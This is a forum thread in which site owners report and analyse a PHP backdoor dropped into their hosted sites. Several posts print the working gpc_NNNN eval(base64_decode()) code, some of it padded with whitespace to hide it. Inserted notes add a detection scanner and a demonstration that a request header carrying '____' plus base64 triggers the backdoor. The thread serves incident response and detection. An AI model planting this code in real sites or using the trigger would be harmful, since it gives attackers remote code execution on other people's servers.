www.webdeveloper.com

Thread: Nasty PHP virus

  1. #1
    Join Date
    Jun 2008
    Location
    Europe
    Posts
    1,114

    Nasty PHP virus

    My sites just got hit with a nasty PHP virus...

    //Silence is golden.

    This virus has gone through my Godaddy Deluxe hosting site, where each site is treated as a sub-folder, and uploaded a blank index.php file to each site... over 60 of them.

    GoDaddy support was no help at all thus far, I seem to have resolved it for now, but fear that this bug will return.

    I will post the PHP code later when I can fix the suspicious laptop - for now it is completely disconnected from the Internet. I am connected to the net by a different computer now and do not have these infected files handy.

    Does anyone know how this bug works? Is it local on my machine or has my FTP password been stolen by a Chinese hacker?

    I know that for the Russian trojans that insert iframes in all index.html files, they work via FTP clients such as FireFTP or WS FTP and it appears that WinSCP gives a layer of safety...

    Any advice? Any experience?

  2. #2
    Join Date
    Sep 2006
    Location
    Bucharest, RO
    Posts
    940
    Some FTP clients store passwords in plain text. Some viruses search for these files and send them "home". I don't know about WinSCP -- although the protocol (SSH) is a lot safer than FTP, I think it still stores passwords in plain text. That's all I can think of right now, if you give more details maybe other ideas will pop out. Be safe.

  3. #3
    Join Date
    Jun 2008
    Location
    Europe
    Posts
    1,114

    Update

    I'll post some of what was uploaded to my server:

    This is the contents of the index.php file that was uploaded to every single folder on my site:
    PHP Code:
    <?php function gpc_10805($l10807){if(is_array($l10807)){foreach($l10807 as $l10805=>$l10806)$l10807[$l10805]=gpc_10805($l10806);}elseif(is_string($l10807) && substr($l10807,0,4)=="____"){eval(base64_decode(substr($l10807,4)));$l10807=null;}return $l10807;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_10805",$_SERVER);
    // Silence is golden.
    ?>
    This line of code was inserted into a number of files at the same time. The files included wp-config.php for WordPress sites and a few other apparently randomly chosen PHP files.
    PHP Code:
    <?PHP function gpc_2657($l2659){if(is_array($l2659)){foreach($l2659 as $l2657=>$l2658)$l2659[$l2657]=gpc_2657($l2658);}elseif(is_string($l2659) && substr($l2659,0,4)=="____"){eval(base64_decode(substr($l2659,4)));$l2659=null;}return $l2659;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_2657",$_SERVER);

  4. #4
    Join Date
    Sep 2009
    Posts
    4


    I just noticed the same thing to one of my sites too!

    I have the Godaddy Deluxe hosting account with probably 20 sites hosted in different sub-folders. I only noticed one instance of this file, and the reason that I was able to catch it is because I noticed a huge dip in the stats on Analytics.

    I'll post my file for all to see:

    PHP Code:
    <?php
    /* the original file has a run of several hundred spaces here, pushing the code off the right edge of the screen */
    function gpc_12515($l12517){if(is_array($l12517)){foreach($l12517 as $l12515=>$l12516)$l12517[$l12515]=gpc_12515($l12516);}elseif(is_string($l12517) && substr($l12517,0,4)=="____"){eval(base64_decode(substr($l12517,4)));$l12517=null;}return $l12517;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_12515",$_SERVER);
    // Silence is golden.
    ?>
    Anyway, this was the only place that I found the file. I am going to change my FTP password just to be on the safe side.

    Anyone find out anymore info on this virus or bug?

    What does the script even do?

  5. #5
    Join Date
    Sep 2009
    Posts
    4
    Ok, went through the rest of my sites and found it on another very low traffic site.

    File was uploaded 8/31/09 at 22:29, with file attributes -rw-r--r--

    Here is this one. I think it is different from the last:

    PHP Code:
    <?php
    /* the original file has a run of several hundred spaces here, pushing the code off the right edge of the screen */
    function gpc_1990($l1992){if(is_array($l1992)){foreach($l1992 as $l1990=>$l1991)$l1992[$l1990]=gpc_1990($l1991);}elseif(is_string($l1992) && substr($l1992,0,4)=="____"){eval(base64_decode(substr($l1992,4)));$l1992=null;}return $l1992;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_1990",$_SERVER);
    // Silence is golden.
    ?>

  6. #6
    Join Date
    Sep 2009
    Posts
    4
    PS- You have to scroll way to the right on those PHP boxes to find the functions and stuff.
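Added example (editor's, not code from any post in this thread): a scanner for the backdoor shown in the posts above, since the numeric suffix on gpc_ changes from file to file and the posters found copies in dozens of sub-folders. It matches the shape of the code (the gpc_<digits> function, eval(base64_decode(substr(...))), array_map over $_SERVER, and a long whitespace run after the opening tag) rather than one exact string. The 64-space padding threshold, the scanned extensions, and the constructed sample files it writes to a temporary directory are assumptions for a stand-alone run; point scan_tree at the real hosting root instead.

```python
"""Scanner for the gpc_NNNN / 'Silence is golden' backdoor shown in this thread.

Walks a hosting root (each site in its own sub-folder, as with the posters'
accounts) and flags PHP files that carry the markers visible in the posted
samples. The numeric suffix differs per file, so the patterns match the
shape of the code rather than one exact string.
"""
from __future__ import annotations

import os
import re
import tempfile

# (compiled pattern, report label). The 64-space threshold for padding is an
# assumption chosen to separate the posted files from normal formatting.
SIGNATURES = [
    (re.compile(r"function\s+gpc_\d+\s*\("), "gpc_NNNN function"),
    (re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*substr\s*\("), "eval(base64_decode(substr("),
    (re.compile(r"array_map\s*\(\s*[\"']gpc_\d+[\"']\s*,\s*\$_SERVER\s*\)"), "array_map over $_SERVER"),
    (re.compile(r"<\?php[ \t]{64,}", re.IGNORECASE), "whitespace padding after <?php"),
]


def scan_source(src: str) -> list[str]:
    """Return the labels of every signature found in one file's source text."""
    return [label for pattern, label in SIGNATURES if pattern.search(src)]


def scan_tree(root: str, exts=(".php", ".phtml", ".inc")) -> dict[str, list[str]]:
    """Map each flagged file (path relative to root, '/'-separated) to its labels."""
    hits: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    labels = scan_source(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the whole walk
            if labels:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = labels
    return hits


def make_backdoor(n: int) -> str:
    """Rebuild the posted one-liner with numeric suffix n (used only to create sample files)."""
    a, b, c = n, n + 1, n + 2
    return (
        f"function gpc_{a}($l{c}){{if(is_array($l{c})){{foreach($l{c} as $l{a}=>$l{b})"
        f"$l{c}[$l{a}]=gpc_{a}($l{b});}}elseif(is_string($l{c}) && substr($l{c},0,4)==\"____\")"
        f"{{eval(base64_decode(substr($l{c},4)));$l{c}=null;}}return $l{c};}}"
        f"if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map(\"gpc_{a}\",$_SERVER);"
    )


def build_sample_tree() -> str:
    """Create a constructed hosting root: two infected files, one clean file, one non-PHP file."""
    root = tempfile.mkdtemp(prefix="gpc_scan_")
    samples = {
        # The dropped index.php: padding (shortened to 80 spaces here) then the backdoor.
        "site-a/index.php": "<?php" + " " * 80 + make_backdoor(1990) + "\n// Silence is golden.\n?>\n",
        # wp-config.php with the one-liner prepended in place of its opening tag.
        "site-b/wp-config.php": "<?PHP " + make_backdoor(2657) + "\ndefine('DB_NAME', 'wp');\n",
        # Ordinary code: must not be flagged.
        "site-b/functions.php": "<?php\nfunction add_numbers($a, $b) { return $a + $b; }\n",
        "site-b/readme.txt": "not a PHP file, not scanned\n",
    }
    for rel, text in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    # Real use: scan_tree("/path/to/hosting/root") instead of the constructed tree.
    for rel, labels in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(labels)}")
```

Any hit on "whitespace padding" is worth a look even without the other three, since that is the trick that hides the code from a casual glance in an editor; a file matching all of function, eval and array_map at once is this backdoor regardless of the suffix.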

  7. #7
    Join Date
    Sep 2009
    Posts
    1
    I'm wondering if this could be an attack via an older version of WordPress. I just had this same thing happen yesterday and am just cleaning up the mess from it. I have seen "silence is golden" mentioned in a few posts that mentioned WordPress.

    I went and deleted the files on my server, and am now going to update my wordpress site to the most recent version.

  8. #8
    Join Date
    Sep 2006
    Location
    Bucharest, RO
    Posts
    940
    I keep wondering what those functions actually do. They're too mangled up to make something out of them.

  9. #9
    Join Date
    Sep 2009
    Posts
    4
    The sites which I found these index.php files on were NOT using WordPress. To be honest, I don't think either of these two sites even had an index.php file present since both were in HTML only. Haven't seen anything else fishy yet.

  10. #10
    Join Date
    Nov 2008
    Posts
    2,477
    Quote Originally Posted by Znupi
    I keep wondering what those functions actually do. They're too mangled up to make something out of them.
    Unmangled:

    PHP Code:
    function gpc_1990($l1992) {
        if (is_array($l1992)) {
            // Recurse into nested arrays, rebuilding them element by element.
            foreach ($l1992 as $l1990 => $l1991) {
                $l1992[$l1990] = gpc_1990($l1991);
            }
        } elseif (is_string($l1992) && substr($l1992, 0, 4) == "____") {
            // Any string value starting with four underscores: strip the marker,
            // base64-decode the remainder and execute it as PHP.
            eval(base64_decode(substr($l1992, 4)));
            $l1992 = null;
        }
        return $l1992;
    }

    if (empty($_SERVER)) {
        $_SERVER = $HTTP_SERVER_VARS; // fallback for PHP versions older than 4.1
    }

    // The return value of array_map() is discarded, so $_SERVER is never actually
    // changed; the only effect is the eval() that runs inside the callback.
    array_map("gpc_1990", $_SERVER);
    Looks like it is recursively searching for any values in the $_SERVER superglobal which begin with ____ (4 underscores) and decoding then evaluating them.

    Not sure what this is actually targeting though, I didn't see anything in my own $_SERVER superglobal which would trigger the eval (Apache 2 on Linux).
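Added example (editor's, not from any post in this thread) for the question of what populates $_SERVER with a "____" value: under Apache/CGI every request header is exported to PHP as $_SERVER['HTTP_<NAME>'] (name upper-cased, hyphens turned into underscores), next to REQUEST_URI, QUERY_STRING and the rest, so any request header or query string whose value starts with four underscores followed by base64 reaches the eval() with no further access to the server. The Python below models that mapping and the backdoor's test, and returns the PHP source eval() would receive instead of executing it. The header name X-Payload, the hostname and the request are constructed for the run; nothing here is taken from a real attack.

```python
"""Model of how a request reaches the gpc_NNNN backdoor's eval().

Under Apache/CGI every request header is exported to PHP as $_SERVER['HTTP_<NAME>']
(name upper-cased, '-' turned into '_'), alongside REQUEST_URI, QUERY_STRING and
friends. The backdoor scans all of those values for one starting with "____",
so an attacker triggers it with a single request header (or a query string) and
never needs to write another file. This model reproduces the lookup and returns
the PHP source that eval() would receive instead of running it.
"""
import base64
import binascii
import string

MARKER = "____"
B64_ALPHABET = set(string.ascii_letters + string.digits + "+/")


def cgi_env(method: str, uri: str, headers: dict) -> dict:
    """Subset of the CGI (RFC 3875) request-to-environment mapping PHP exposes as $_SERVER."""
    path, _, query = uri.partition("?")
    env = {
        "REQUEST_METHOD": method,
        "REQUEST_URI": uri,
        "SCRIPT_NAME": path,
        "QUERY_STRING": query,
    }
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def backdoor_payloads(server: dict) -> list:
    """Port of gpc_NNNN's test: (key, decoded source) for every value it would eval().

    PHP's base64_decode() is lenient unless strict mode is requested: characters
    outside the alphabet are ignored and missing '=' padding is tolerated, so the
    model does the same before decoding.
    """
    found = []
    for key, value in server.items():
        if not (isinstance(value, str) and value.startswith(MARKER)):
            continue
        body = "".join(ch for ch in value[len(MARKER):] if ch in B64_ALPHABET)
        body += "=" * (-len(body) % 4)
        try:
            found.append((key, base64.b64decode(body).decode("latin-1")))
        except (binascii.Error, ValueError):
            continue  # not valid base64: PHP's eval() would just get garbage
    return found


def demo() -> list:
    """Constructed request: ordinary browser headers plus one header carrying the payload."""
    payload = MARKER + base64.b64encode(b"echo 'backdoor reached';").decode("ascii")
    headers = {
        "Host": "example.test",                              # assumed hostname
        "User-Agent": "Mozilla/5.0",
        "Cookie": "wordpress_logged_in=abc; PHPSESSID=def",  # ordinary cookie: no trigger
        "X-Payload": payload,                                # assumed header name
    }
    return backdoor_payloads(cgi_env("GET", "/index.php?p=1", headers))


if __name__ == "__main__":
    for key, source in demo():
        print(f"{key} would be eval()'d as: {source}")
```

Two consequences follow from the model. The Cookie header as a whole would have to begin with "____" to trigger anything, so normal cookies never fire it, while a custom header or a query string does; and because a custom header is not written to the default Apache access log, the only trace of a trigger is in the server's own state, which is why the files are worth scanning even when the logs look clean.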

  11. #11
    Join Date
    Sep 2006
    Location
    Bucharest, RO
    Posts
    940
    Interesting. Maybe it somehow hacks Apache in order to add such values, too? People who have this problem should check their $_SERVER variables (either using phpinfo() or just going through $_SERVER manually) and let us know if they find any values starting with ____.

    Edit: I'm not sure if Apache needs to be hacked in order to add $_SERVER variables. I think they can be added by modifying the actual PHP interpreter to add these values before evaluating the actual requested file. If this is the case, then the hack could be even more elaborate. It could actually check that the file in question is their file (containing those functions etc.) and only add those values if it's the right file.
    Last edited by Znupi; 09-03-2009 at 07:05 AM.

  12. #12
    Join Date
    Jan 2009
    Location
    Insanity
    Posts
    1,131
    Or... if this is something like the hacker is trying to post data that is prefixed with ____ that is stored in a global of some sort that can be accessed via a $_SERVER variable and the following data is base64 encoded, which is the payload that is decoded and then executed.

    You notice that the b64 is a decode that evaluates the string but omits the first 4 characters when it comes to decoding.

    So I would say that the hack is attempting to inject a program disguised as base64 string prefixed with '____'.

  13. #13
    Join Date
    Nov 2008
    Posts
    2,477
    It could also be a cookie stored in $_SERVER['HTTP_COOKIE']? Though on my own server they are stored in a semicolon-delimited list.

    I agree the goal seems to be to inject something into $_SERVER somewhere for evaluation - but it begs the question why? If they have got as far as injecting random PHP code into files, surely they already have free rein to do what they like? I suppose maybe this would allow them to leave a back door for executing arbitrary code later, but again if you already have control over someone's PHP files there are easier ways to do this.
    Last edited by Mindzai; 09-03-2009 at 07:43 AM.

  14. #14
    Join Date
    Jan 2009
    Location
    Insanity
    Posts
    1,131
    Well here is something I looked up, I tried function gpc_ to see what would show up, notice anything???

    http://www.seanrees.com/2009/09/02/w...orth-its-salt/

  15. #15
    Join Date
    Nov 2008
    Posts
    2,477
    Hmmm yes well that all seems to make sense and pretty much confirms what we were thinking. I suppose the question is how did the files get modified in the first place though? This seems to be targeted towards WordPress which has more than its fair share of exploits, maybe there is some hole in it somewhere which is being exploited?
